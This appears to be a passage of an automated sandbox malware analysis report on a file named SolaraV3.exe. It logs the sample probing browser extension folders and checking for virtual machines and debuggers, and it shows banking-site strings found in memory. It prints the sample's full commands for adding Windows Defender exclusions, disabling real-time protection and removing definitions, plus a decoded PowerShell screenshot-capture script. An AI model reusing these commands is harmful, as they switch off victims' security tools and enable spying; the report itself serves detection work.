Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales	Jump to behavior

Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vboxtrayZ
Source: getmac.exe, 0000005B.00000003.1777948057.00000236408A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777616203.000002364089F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779115042.00000236408A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: getmac.exe, 0000005B.00000003.1777948057.00000236408A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777616203.000002364089F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779115042.00000236408A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: svchost.exe, 0000001A.00000002.2809507862.000001407B22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2811395049.000001407C854000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777948057.00000236408A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777616203.000002364089F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779115042.00000236408A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmsrvc
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmsrvcZ
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: qemu-ga
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmware
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmusrvc
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmusrvcZ
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: rar.exe, 0000006E.00000003.1935668462.000001DD0C739000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\MW
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareservice
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareservicer5
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareuser
Source: getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777616203.000002364089F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vboxserviceZ
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwaretray
Source: SolaraV3.exe, 00000002.00000003.1920657343.000001FC25646000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770986223.000001FC2526D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2042793103.000001FC256C4000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1767469686.000001FC256C4000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1919694922.000001FC2612A000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921057827.000001FC2526D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770391926.000001FC25646000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2045845216.000001FC2611B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2040009745.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1579360087.000001FC25402000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxtray
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: rar.exe, 0000006E.00000003.1935668462.000001DD0C739000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779208598.00000236408C1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777587060.00000236408BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: getmac.exe, 0000005B.00000003.1777948057.00000236408A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777616203.000002364089F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779115042.00000236408A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareuserZ
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: qemu-gaZ
Source: getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779208598.00000236408C1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777587060.00000236408BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmtoolsd
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwarec
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwaretrayZ
Source: getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-Vf
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareservicer5Z
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815731		2_2_00007FFB0B815731
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814246		2_2_00007FFB0B814246

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 2_2_00007FFB0B815731 rdtsc

2_2_00007FFB0B815731

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 1_2_00007FF6DC71A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_00007FF6DC71A614

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 2_2_00007FFB0BB66EE0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

2_2_00007FFB0BB66EE0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 1_2_00007FF6DC723480 GetProcessHeap,

1_2_00007FF6DC723480

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC71A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF6DC71A614
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC70D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF6DC70D12C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC70C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00007FF6DC70C8A0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC70D30C SetUnhandledExceptionFilter,	1_2_00007FF6DC70D30C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC71A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FF6DC71A614
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC70D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FF6DC70D12C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC70C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FF6DC70C8A0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC70D30C SetUnhandledExceptionFilter,	2_2_00007FF6DC70D30C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815A24 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FFB0B815A24
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C3C0376 SetUnhandledExceptionFilter,	2_2_00007FFB0C3C0376
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EED4C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	110_2_00007FF74EED4C10
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EECB52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	110_2_00007FF74EECB52C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EECB6D8 SetUnhandledExceptionFilter,	110_2_00007FF74EECB6D8
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EECA66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	110_2_00007FF74EECA66C

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}

Modifies Windows Defender protection settings

Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
